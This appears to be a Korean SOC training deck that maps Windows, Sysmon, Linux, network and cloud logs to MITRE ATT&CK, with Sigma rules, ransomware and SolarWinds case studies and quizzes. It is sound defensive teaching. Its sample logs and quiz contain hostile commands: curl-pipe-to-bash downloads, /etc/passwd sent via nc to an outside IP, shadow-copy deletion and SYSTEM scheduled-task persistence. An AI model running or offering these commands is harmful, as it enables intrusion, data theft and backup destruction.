EventID	의미	ATT&CK 연관	핵심 필드
1102	보안 로그 지움	T1070.001 Indicator Removal	SubjectUserName
7036	서비스 상태 변경	T1562.001 Impair Defenses	ServiceName, param2(started/stopped)
4769	Kerberos TGS 요청	T1558.003 Kerberoasting	TicketEncryptionType, ServiceName
4662	AD 객체 접근	T1003.006 DCSync	ObjectName, Properties, SubjectUserName
4776	NTLM 인증	T1550.002 Pass-the-Hash	TargetName, Workstation, ErrorCode
5145	공유 폴더 접근	T1039 Network Share	ShareName, ObjectType, AccessMask
5156	방화벽 연결 허용	T1021 Remote Services	DestAddress, DestPort, Application
4104	PowerShell SBL	T1059.001 PowerShell	ScriptBlockText

보강 설명 Windows 이벤트 로그에서 SOC가 가장 많이 참조하는 이벤트 ID를 정리합니다. 로그를 볼 때마다 이벤트 ID를 찾아보는 번거로움을 줄이고… 시간축과 다음 조치를 함께 보면 흐름이 선명해집니다.

Windows EventID4625 로그인 실패4688 프로세스

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기

실전 로그 분석: Sysmon 핵심 EventID 카탈로그

Windows 기본 로그의 빈틈을 채워주는 Sysmon — SOC 필수 EventID와 ATT&CK 매핑

로그 분석 실전

Sysmon EventID	이름	주요 수집 정보	ATT&CK 주요 탐지	SOC 활용도
1	Process Create	ProcessName, CommandLine, ParentProcess, Hashes, IntegrityLevel	T1059, T1218, T1204	★★★★★
2	File Creation Time	파일 타임스탬프 변경 탐지 (Timestomping)	T1070.006 Timestomp	★★★
3	Network Connection	프로세스별 외부 연결, DestinationIP, DestPort	T1071, T1105, T1021	★★★★★
7	Image Loaded	DLL 로드 정보, 서명 여부	T1055 DLL Injection	★★★★
8	CreateRemoteThread	원격 스레드 생성 (프로세스 인젝션 핵심)	T1055 Process Injection	★★★★★
10	ProcessAccess	다른 프로세스 메모리 접근 (lsass.exe 접근 탐지)	T1003.001 LSASS Dump	★★★★★
11	FileCreate	파일 생성 이벤트, 경로, 해시	T1105, T1505.003 WebShell	★★★★
13	Registry Value Set	레지스트리 값 변경	T1547.001 Run Key Persistence	★★★★★
22	DNS Query	프로세스별 DNS 쿼리, 응답 IP	T1071.004, T1568 DGA	★★★★
23	FileDelete	파일 삭제 이벤트 (증거 인멸 탐지)	T1070.004 Indicator Removal	★★★

보강 설명 Sysmon은 Windows 기본 이벤트 로그보다 훨씬 풍부한 정보를 제공합니다. 특히 프로세스 생성 시 커맨드 라인과 해시, 네트워크 연결, 레지스트리 변경을 상세히 기록합니다. 시간 순서와 후속 조치를 같이 보면 공격 흐름이 더 또렷해집니다.

SysmonEventID 1 프로세스EventID 3 네트워크

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

실전 로그 분석: Linux 핵심 로그와 ATT&CK 매핑

auth.log · auditd · bash_history · syslog — Linux 서버 침해 흔적을 어디서 찾는가

로그 분석 실전

# /var/log/auth.log — 인증 이벤트 # SSH Brute Force (T1110.001) Jun 21 03:11:21 sshd: Failed password for root from 203.0.113.50 port 51123 ssh2 # Privilege Escalation via sudo (T1548.003) Jun 21 03:18:44 sudo: www-data : TTY=unknown PWD=/var/www ; USER=root ; COMMAND=/bin/bash # /var/log/audit/audit.log — auditd # Crontab 수정 (T1053.003) type=SYSCALL arch=x86_64 syscall=rename comm="crontab" name="/var/spool/cron/tmp...." # ~/.bash_history — 명령 기록 curl http://203.0.113.50/s.sh | bash cat /etc/passwd | nc 203.0.113.50 4444

로그 파일	ATT&CK 탐지	핵심 패턴
`/var/log/auth.log`	T1110, T1548	Failed password 반복, sudo 비정상 사용
`/var/log/audit/audit.log`	T1053, T1098, T1562	syscall=execve, 파일 수정, 권한 변경
`~/.bash_history`	T1059.004, T1105	curl/wget 외부 URL, nc/netcat 사용
`/var/log/syslog`	T1543.002, T1053	서비스 등록/시작, cron 실행
`/var/log/apache2/access.log`	T1190, T1505.003	SQLi 패턴, 웹쉘 GET/POST
`/proc/[pid]/`	T1059.004, T1055	메모리 분석, 프로세스 정보

💡 auditd 필수 규칙:
-a always,exit -F arch=b64 -S execve — 모든 명령 실행 감사
-w /etc/crontab -p wa — crontab 수정 감사
-w /etc/sudoers -p wa — sudo 정책 변경 감사

보강 설명 Linux 서버는 Windows만큼 자주 공격 대상이 됩니다. auth.log, auditd, bash_history 등에서 공격 흔적을 찾는 방법을… 시간축과 다음 조치를 함께 보면 흐름이 선명해집니다.

auth.logauditdbash_history

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기

실전 로그 분석: 네트워크 로그 체계와 ATT&CK 매핑

NetFlow · Proxy · DNS · Firewall — 네 가지를 교차하면 C2 · Exfiltration · Lateral 탐지가 가능

로그 분석 실전

로그 유형	주요 제공 정보	ATT&CK 탐지 대상
NetFlow / IPFIX	src/dst IP, 포트, 프로토콜, 바이트, 패킷, 시간	C2 Beaconing, Lateral Movement (포트), Exfiltration (용량)
Proxy 로그	URL, User-Agent, 상태코드, 응답 크기, 사용자	C2 HTTPS, Exfiltration via Web Svc, 피싱 링크 클릭
DNS 로그	쿼리 도메인, 타입, 응답 IP, 클라이언트 IP	C2 (DGA, DNS Tunneling), Discovery (내부 DNS 쿼리)
Firewall 로그	허용/차단, src/dst IP·포트, 인터페이스	Lateral Movement (내부 포트 스캔), C2 (외부 연결)
IDS/IPS 로그	시그니처명, 심각도, 패킷 내용	Initial Access (CVE 익스플로잇), C2 (알려진 도구 시그니처)

교차 분석 시나리오

C2 탐지: DNS 쿼리(희귀 도메인) → Proxy 연결(주기적 POST) → NetFlow(장시간 소량) 순 교차
Exfil 탐지: NetFlow(대용량 아웃바운드) → Proxy(업로드 대상 확인) → CASB(서비스 분류)
Lateral 탐지: Firewall(내부 → 내부 RDP/SMB 포트) → WinEvent(4624 LogonType 3/10)

💡 네트워크 분석 핵심 원칙:
단일 로그만으로는 결론 금지. DNS + Proxy + NetFlow를 최소 2개 이상 교차해야 C2 High Confidence 달성 가능

보강 설명 네트워크 로그는 C2, Exfiltration, Lateral Movement 탐지의 핵심입니다. NetFlow, Proxy, DNS, Firewall 로그를 어떻게 교차 분석하는지 설명합니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

NetFlowProxy 로그DNS 로그

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

클라우드 환경 ATT&CK 적용: 주요 Technique와 탐지

IAM 남용 · 스토리지 접근 · 컨테이너 탈출 — 클라우드 특화 공격 패턴과 탐지 포인트

클라우드 ATT&CK

AWS / 클라우드 주요 공격 패턴

T1078.004 Cloud Accounts — 탈취된 IAM 키/역할로 접근
T1136.003 Cloud Account 생성 — 백도어 IAM 계정 등록
T1530 Data from Cloud Storage — S3/GCS 버킷 대량 다운로드
T1619 Cloud Storage Object Discovery — 버킷 목록 열거
T1537 Transfer Data to Cloud Account — 공격자 계정으로 데이터 이동
T1098.001 Additional Cloud Credentials — 추가 액세스 키 생성

클라우드 탐지 포인트

AWS CloudTrail: 비정상 API 호출 (CreateUser, AttachUserPolicy, GetSecretValue)
IAM 이상: 신규 액세스 키 생성, 정책 직접 연결, FullAccess 권한 부여
스토리지 이상: 비공개 버킷의 Public 설정 변경, 대량 Object 다운로드
지역 이상: 평소 미사용 리전에서 리소스 생성
루트 계정 사용: 루트 계정 직접 로그인은 즉각 경보

# CloudTrail 의심 API 탐지 eventSource = "iam.amazonaws.com" eventName IN ("CreateUser", "AttachUserPolicy", "CreateAccessKey", "PutUserPolicy") → 비업무 시간 + 새 사용자가 수행 시 고위험

보강 설명 클라우드 환경에서의 ATT&CK 적용은 기존 엔드포인트 중심 접근과 다릅니다. IAM 권한 남용, 클라우드 스토리지 접근, 컨테이너 탈출 등이 주요 공격 경로입니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

클라우드 ATT&CKIAM 권한 남용CloudTrail

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
클라우드 ATT&CK·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

랜섬웨어 공격 체인 분석: 침투부터 암호화까지

최종 암호화(T1486) 이전에 8~12개의 탐지 기회가 존재한다 — 조기 차단이 핵심

시나리오 심층

T1566.001 피싱 첨부파일 메일GW 탐지

→

T1059.001 PowerShell 실행 EDR 탐지

→

T1003.001 자격증명 탈취 EDR/SIEM

→

T1021.001 RDP 내부 이동 Firewall/EDR

→

T1562.001 EDR 비활성화 서비스 중지 경보

→

T1490+T1486 VSS 삭제 + 암호화 최후 탐지 기회

각 단계별 최적 차단 포인트

피싱 단계: 메일GW 샌드박스 차단 → 비용 최소, 효과 최대
PowerShell 단계: EDR Script Block Logging + AMSI
자격증명 탈취: Credential Guard 활성화, LSASS 보호
내부 이동: 세그멘테이션, RDP 최소 접근 원칙
EDR 비활성화: Tamper Protection + 즉각 격리 자동화
VSS 삭제 탐지: vssadmin 명령 경보 + 자동 격리

🚨 랜섬웨어 대응 골든 타임:
vssadmin delete shadows 명령이 탐지되면 암호화 시작이 수 분 내. 이 시점에서 네트워크 격리 + 백업 무결성 확인 + BCP 발동이 즉시 이루어져야 피해를 최소화할 수 있다

보강 설명 랜섬웨어는 최종 Impact 단계이지만 그 전에 수많은 ATT&CK 단계를 거칩니다. 초기 침투부터 암호화까지의 체인을 분석하면 어느 단계에서 차단할 수 있었는지 파악할 수 있습니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1486랜섬웨어공격 체인

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1486 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

T1195 공급망 공격 분석: SolarWinds 유형 이해

정상 서명된 업데이트로 배포 — 기존 탐지 체계를 완전히 우회한 공급망 공격의 구조

시나리오 심층

공급망 공격 구조

공격자 목표: 소프트웨어 개발사 빌드 환경 침해 → 악성 코드 삽입
배포 경로: 정상 소프트웨어 업데이트 서버 → 고객 자동 설치
신뢰 우회: 정상 코드 서명 인증서로 서명 → AV/EDR 탐지 우회
장기 잠복: 최초 활성화까지 수 주~수 개월 대기 (탐지 회피)
선택적 활성화: 특정 환경에서만 악성 행위 (전체 배포 중 일부만)

탐지 전략 (매우 어려움)

소프트웨어 공급업체 보안 평가 (Third-party Risk)
소프트웨어 업데이트 후 행위 기반 모니터링
SBOM(소프트웨어 자재명세서) 관리
네트워크 통신 이상: 정상 소프트웨어의 비정상 외부 연결

SolarWinds 공격 타임라인 요약

빌드 환경 침해

SolarWinds 개발 인프라에 Sunspot 악성 코드 삽입 → 빌드 시 Sunburst 자동 주입

정상 업데이트로 배포 (18,000+ 고객)

Orion 플랫폼 정상 업데이트에 포함 → 자동 설치. 디지털 서명 정상

14일 대기 후 선택적 C2 활성화

설치 후 2주 잠복 → 특정 환경에서만 avsvmcloud.com으로 C2 통신

보강 설명 공급망 공격은 T1195 Supply Chain Compromise로 분류됩니다. SolarWinds 사례는 정상 소프트웨어 업데이트를 통한 침투로, 기존 탐지 체계를 완전히 우회했습니다. 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

T1195T1195 Supply ChainSolarWinds

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
T1195 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

CTI와 ATT&CK 연동: 위협 인텔리전스를 탐지로 전환하기

알려진 위협 행위자의 TTP → Navigator 레이어 → 탐지 우선순위 결정 → 룰 작성

CTI 연동

위협 행위자 식별

우리 업종을 공격하는 그룹 식별 (예: 금융 → Lazarus Group, 제조 → APT10). KISA, MITRE, Mandiant 보고서 참조

TTP 추출 및 ATT&CK 매핑

보고서에서 "이 그룹은 X를 했다" → ATT&CK Technique ID로 변환. MITRE 사이트에서 그룹 페이지 직접 확인 가능

Navigator 레이어 생성

해당 그룹의 Technique를 Navigator에 레이어로 표시 → 우리 Coverage와 비교 → 공백 식별

탐지 우선순위 결정 및 룰 작성

그룹이 자주 쓰는 Technique 중 Coverage가 낮은 것 = 최우선 탐지 룰 작성 대상

예시: Lazarus Group (G0032)

주요 Technique: T1566 Phishing, T1059 PowerShell, T1027 Obfuscation, T1071 C2, T1486 Ransomware
Navigator에서 G0032 레이어 불러오기 → 우리 Coverage 레이어와 비교
Coverage 0~1인 Lazarus TTP = 즉시 탐지 룰 작성 필요

📍 ATT&CK 그룹 페이지:
attack.mitre.org/groups/ → 그룹명 검색 → Techniques Used 섹션에서 전체 TTP 확인 가능. Navigator에서 직접 불러오기도 지원

보강 설명 위협 인텔리전스(CTI)를 ATT&CK과 연동하면 알려진 위협 행위자의 공격 패턴을 탐지 룰로 전환할 수 있습니다. 프로파일링 → Navigator 레이어 → 탐지 우선순위 결정 흐름을 설명합니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

CTI ATT&CK 연동위협 행위자 프로파일TTP 매핑

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
CTI ATT&CK 연동·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

ATT&CK 기반 SOC 보안 성숙도 모델

Level 0 무지에서 Level 5 최적화까지 — 우리 조직은 지금 어디에 있는가

성숙도 모델

Level 0~1 | 반응형
ATT&CK 인식 없음 또는 이름만 앎
경보 발생 후 단순 대응
탐지 룰 ATT&CK 태그 없음
Coverage 분석 없음
목표: 용어 이해 + 기본 태그 부착


Level 2~3 | 구조화
주요 Technique 탐지 룰 존재
ATT&CK 태그 부착된 탐지 체계
Coverage 분석 정기 시행
기본 헌팅 플레이북 보유
목표: Coverage 확장 + 헌팅 정례화


Level 4~5 | 최적화
CTI 기반 TTP 자동 탐지 전환
Purple Team 정기 운영
탐지 엔지니어링 파이프라인 자동화
Coverage 3점 Technique 다수 보유
목표: 예측 기반 방어 + 지속 개선

💡 자가 진단: 다음 4가지를 체크하면 현재 레벨 추정 가능
① SIEM 탐지 룰에 ATT&CK 태그가 있는가? ② Coverage 분석을 최근 3개월 내 한 적이 있는가? ③ 헌팅 플레이북이 문서화되어 있는가? ④ Purple Team을 올해 1회 이상 했는가?

보강 설명ATT&CK을 얼마나 잘 활용하는지에 따라 SOC 성숙도를 평가할 수 있습니다. 레벨 0에서 5까지의 성숙도 모델을 소개하고, 각 레벨에서 무엇을 해야 하는지 설명합니다. 정의·대표 Technique·추가 질문을 함께 정리해 두면 복습 …

SOC 성숙도ATT&CK 성숙도 레벨Coverage 확장

복습 포인트

SOC 성숙도 핵심 정의를 한 문장으로 다시 말하기
ATT&CK 성숙도 레벨와 연결되는 대표 로그 또는 사례 1개 떠올리기
다음 슬라이드로 이어지는 질문을 스스로 만들기

암기보다 이해

왜 필요한지와 무엇을 판단하는지 구분하기
용어-목적-근거를 세 칸 표처럼 정리하기
팀원에게 설명해 보며 빈 구간을 찾기

학습 요소

Coverage 확장 관련 ATT&CK ID·로그·조치를 묶어 기억하기
오탐 가능성과 탐지 공백도 함께 적어 두기
실제 현업 사례 1개와 연결해 기억 강화

빠른 매핑 훈련: 5초 안에 Technique를 말하라

실무에서는 빠른 초기 판단이 중요 — 근거는 나중에, 먼저 패턴 인식 속도를 키운다

속성 훈련

5초 판단 연습 — 아래 로그를 보고 즉시 Technique를 말하시오

vssadmin.exe delete shadows /all /quiet
→ ?

net group "Domain Admins" /domain
→ ?

curl -s http://1.2.3.4/s.sh | bash
→ ?

wmic.exe /node:10.0.0.55 process call create "cmd.exe"
→ ?

schtasks /create /ru SYSTEM /sc minute /mo 1 /tn "WinUpdate" /tr "C:\ProgramData\update.exe"
→ ?

정답 확인

T1490 Inhibit System Recovery — VSS 삭제 = 랜섬웨어 전형적 사전 행위

T1069.002 Domain Groups Discovery — 도메인 관리자 그룹 열거

T1059.004 + T1105 Unix Shell + Ingress Tool Transfer — curl 파이프 실행

T1021 + T1047 WMI 기반 원격 프로세스 생성 = Lateral Movement

T1053.005 Scheduled Task — SYSTEM 권한 + %ProgramData% 경로 = 의심 Persistence

보강 설명 속도와 정확도를 동시에 훈련하는 빠른 매핑 퀴즈입니다. 로그 한 줄씩 보고 5초 내 Technique를 말하는 연습입니다. 근거는 나중에 설명하고 속도감 있게 진행합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

매핑 속도 훈련5초 판단직관적 분류

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
매핑 속도 훈련를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

Sigma 룰 작성 실습: T1053.005 Scheduled Task

한 번 작성 → 여러 SIEM으로 변환 — Sigma의 플랫폼 중립 탐지 룰 작성법

탐지 룰 심화

# Sigma Rule 전체 예시 title: Suspicious Scheduled Task Creation at Night id: a7b3e521-9c11-4d2f-bc0a-1234567890ab status: experimental description: | 비업무시간 예약작업 등록 탐지. T1053.005 Scheduled Task/Job. references: - https://attack.mitre.org/techniques/T1053/005/ author: SOC Team, 아울네스트 date: 2024-11-20 tags: - attack.persistence - attack.t1053.005 logsource: product: windows service: security detection: selection: EventID: 4698 TaskContent|contains: - '\Temp\' - '\AppData\' - '\Users\Public\' filter: TaskName|contains: - 'GoogleUpdate' - 'Adobe' condition: selection and not filter falsepositives: - Legitimate software installers level: high

Sigma 룰 핵심 구조

metadata: title, id, status, tags (ATT&CK)
logsource: 어떤 로그를 쓰는지 정의
detection: selection + filter + condition으로 탐지 조건
falsepositives: 알려진 오탐 케이스 문서화
level: informational / low / medium / high / critical

플랫폼 변환

sigma convert -t splunk rule.yml → Splunk SPL
sigma convert -t elastic rule.yml → Elastic DSL
sigma convert -t qradar rule.yml → QRadar AQL
sigmahq.github.io — 커뮤니티 룰 저장소

보강 설명 Sigma는 플랫폼 중립적인 SIEM 탐지 룰 형식입니다. 한번 작성하면 Splunk, Elastic, QRadar 등 다양한 플랫폼으로 변환할 수… 근거와 다음 행동을 함께 적어 두면 바로 실무에 쓰기 좋습니다.

T1053.005Sigma Rule플랫폼 중립

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
T1053.005를 고를 때 대체 설명도 함께 적기

탐지 룰 품질 평가 기준 5가지

좋은 룰을 만드는 것보다 좋은 룰과 나쁜 룰을 구분하는 기준이 더 중요하다

탐지 룰 심화

 기준 1: 정탐률 (Precision)경보 중 실제 위협인 비율. 정탐률이 낮으면 SOC 피로도 증가. 목표: 60% 이상
정탐 / (정탐 + 오탐) × 100
 기준 2: 재현율 (Recall)실제 공격 중 탐지된 비율. 재현율이 낮으면 공격을 놓침. 목표: 최대화
정탐 / (정탐 + 미탐) × 100
 기준 3: 탐지 속도공격 발생 후 경보까지 걸리는 시간. 실시간 vs 배치 탐지 설계에 영향. 목표: 5분 이내

기준 4: 운영 부담 (Noise)

일일 경보 발생 건수. 너무 많은 경보는 중요한 것을 놓치는 원인. 목표: 분석가 1인당 일 20건 이하

기준 5: 검증 여부 (Validated)

실제 공격 시뮬레이션에서 동작 확인 여부. 검증 없이 운영하면 Coverage 과대평가. Coverage 점수 3점 조건

보강 설명모든 탐지 룰이 다 좋은 룰은 아닙니다. 룰 품질을 평가하는 기준을 정해두면 우선순위를 정하고 개선 방향을 잡을 수 있습니다. 정답보다 근거·Confidence·다음 행동을 함께 말하도록 채워 두면 발표 완성도가 높아집니다.

룰 품질 기준정탐률오탐률

설명 확장

룰 품질 기준 기준으로 첫 단서를 먼저 분류하기
정탐률를 왜 선택했는지 근거 한 줄로 적기
정답보다 판단 과정을 말로 설명하기

판단 포인트

정상 행위와 의심 행위를 구분하는 기준 메모
High·Medium·Low Confidence 이유 함께 쓰기
추가 수집이 필요한 로그를 마지막에 적기

실습 적용

시작-진행-영향-다음 행동 순서로 30초 설명
탐지 룰 또는 헌팅 가설 1개까지 연결
팀 토론에서는 근거가 강한 판단부터 합의

Purple Team: 공격과 방어가 협력해 탐지를 검증한다

Red Team이 공격하고 Blue Team이 탐지를 확인 — 차이를 함께 분석해 Coverage를 높인다

탐지 검증

공격 기술 선택 (ATT&CK 기반)

Coverage 점수 1~2인 Technique를 테스트 대상으로 선정. 우선순위: 위협 가능성 × Coverage 점수 낮음

안전한 환경에서 공격 실행

격리된 테스트 환경 또는 Atomic Red Team으로 Technique 실행. 실제 시스템 영향 없이

탐지 여부 확인

SIEM/EDR에서 경보 발생 여부 확인. 탐지됨/미탐지/지연탐지로 결과 분류

미탐 원인 분석 → 룰 개선

로그 미수집? 룰 조건 미충족? 오탐 필터 과다? 원인 파악 후 즉시 개선. Coverage 점수 업데이트

Atomic Red Team 활용

도구: github.com/redcanaryco/atomic-red-team
ATT&CK Technique별 공격 시뮬레이션 스크립트 제공
예: Invoke-AtomicTest T1053.005 → 예약 작업 등록 시뮬레이션
탐지 여부를 바로 SIEM에서 확인 → 룰 즉시 개선

✅ Purple Team 효과:
Coverage 2(미검증) → 3(검증 완료) 전환
미탐 발견 시 로그 수집 계획 즉시 수립
오탐 원인 파악 → 룰 정밀도 향상

보강 설명 Purple Team은 Red Team(공격)과 Blue Team(방어)이 협력해 탐지 능력을 검증하는 방법입니다. 단순한 모의해킹과 달리 탐지되지 않은 공격을 함께 분석하고 개선합니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

Purple TeamAtomic Red Team탐지 검증

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
Purple Team·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

ATT&CK 기반 사고 보고서 작성 실전

경영진용(비즈니스 영향) + 기술팀용(분석 상세) — 두 버전을 구분해서 작성한다

보고서 실전

경영진 보고서 구조 (1~2페이지)

Executive Summary (1문단): 무슨 일이 언제 발생했고 현재 상태는?
비즈니스 영향: 어떤 데이터·시스템이 영향받았는가?
대응 현황: 지금 무엇을 하고 있고 언제 완료되는가?
재발 방지: 이번 사고로 무엇을 개선할 것인가?
※ ATT&CK ID는 넣지 말고, 공격자 목적 중심으로 설명

기술 보고서 구조 (5~15페이지)

사건 타임라인: 시간별 행위, ATT&CK 매핑표
로그 근거: 주요 이벤트 로그 발췌 + 분석
공격 체인 다이어그램: 시각적 흐름도
Indicators of Compromise (IOC): IP, 도메인, 해시, 파일명
탐지 개선 권고: 미탐 원인과 Coverage 개선 계획

사고 보고서 작성 체크리스트

☐ 사건 개요: 언제, 어디서, 무엇이, 어떻게
☐ ATT&CK 매핑표: Technique + 근거 + Confidence
☐ 타임라인: 공격 발생 ~ 탐지 ~ 대응 시각 명시
☐ 피해 범위: 영향 받은 시스템·데이터·계정 목록
☐ 즉각 대응 내역: 격리, 차단, 비밀번호 변경 등
☐ 근본 원인 분석: 왜 이 침해가 가능했는가
☐ IOC 목록: 즉시 공유 가능한 형태로
☐ 재발 방지 로드맵: 단기(1주) / 중기(1개월) / 장기(분기)
☐ 다음 리뷰 일정 명시

보강 설명 ATT&CK을 활용한 사고 보고서 작성법입니다. 경영진용과 기술팀용으로 나눠 작성하는 것이 중요합니다. 경영진은 비즈니스 영향과 대응 현황을, 기술팀은 상세 분석과 재발 방지를 봅니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

사고 보고서경영진 보고기술 보고서

이해 포인트

사고 보고서를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
경영진 보고 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

종합 점검 퀴즈: 핵심 개념 20문항

1문항당 5점 × 20 = 100점 — 팀별 경쟁으로 진행

종합 점검

T1566.001은 어떤 Tactic의 어떤 Technique인가?

Data Source: Process / Data Component: Process Creation로 탐지하는 대표 Technique 2개는?

Coverage 점수 0의 의미는?

120초 주기 HTTPS 통신 탐지 → 어떤 ATT&CK Technique?

vssadmin delete shadows /all → 어떤 Technique? 다음에 무엇이 올 가능성이 높은가?

Password Spraying vs Brute Force의 핵심 차이점은?

EXCEL.EXE → cmd.exe → powershell.exe 체인의 ATT&CK 매핑은?

WinEvent 4698의 의미와 관련 ATT&CK Technique는?

Sysmon EventID 10이 중요한 이유는?

Q10

Hunting과 탐지 룰의 근본적 차이는?

Q11

T1003.006 DCSync의 특징과 탐지에 필요한 WinEvent ID는?

Q12

LOLBin이란 무엇이며 대표적인 예 3개는?

Q13

ATT&CK에서 가장 많은 Sub-technique를 보유한 Tactic은?

Q14

Credential Access 탐지 시 다음에 반드시 확인해야 할 Tactic 2개는?

Q15

Confidence Medium과 High의 차이를 구체적 예를 들어 설명하시오

Q16

Impossible Travel이란 무엇이며 어떤 Technique와 연관되는가?

Q17

Purple Team과 Red Team 모의해킹의 차이점은?

Q18

ATT&CK Coverage 분석 결과를 활용하는 3가지 방법은?

Q19

30초 보고 문장의 4단계 프레임을 말하시오

Q20

Golden Ticket 공격 발견 시 즉시 해야 할 필수 대응은?

보강 설명 모듈 전체 내용을 점검하는 종합 퀴즈입니다. 팀별 경쟁 형식으로 진행하면 더 재미있습니다. 점수보다 틀린 문항을 함께 복습하는 것이 더 중요합니다. 정답보다 근거 로그·Confidence·다음 행동까지 같이 적어 두면 발표와 문서화가 훨씬 수월합니다.

종합 퀴즈20문항모듈 복습

풀이 힌트

문제의 첫 단서를 시간·사용자·프로세스·통신 중 어디서 찾을지 먼저 정리
종합 퀴즈를 고를 때 대체 설명도 함께 적기
근거 문장은 실제 로그 한 줄을 짧게 인용해 작성

발표 포인트

시작→진행→영향→다음 행동 순서로 30초 설명
Confidence가 낮다면 추가 수집 항목을 같이 제시
팀 토론에서는 근거가 강한 판단부터 먼저 합의

체크리스트

Tactic·Technique·근거·Confidence 네 칸을 빠짐없이 채우기
정상 가능성과 공격 가능성을 동시에 적어 보기
발표 전에 한 문장 보고 버전으로 한 번 더 압축

종합 퀴즈 해설 — 핵심 답변

틀린 문항을 함께 토론하는 것이 점수보다 중요하다

종합 점검 해설

#	핵심 답변
Q1	T1566.001 = Tactic: Initial Access / Technique: Phishing / Sub-tech: Spearphishing Attachment
Q2	T1059(Execution 계열 전반), T1204 User Execution
Q3	로그도 탐지 룰도 없음 — 완전한 블라인드 스팟
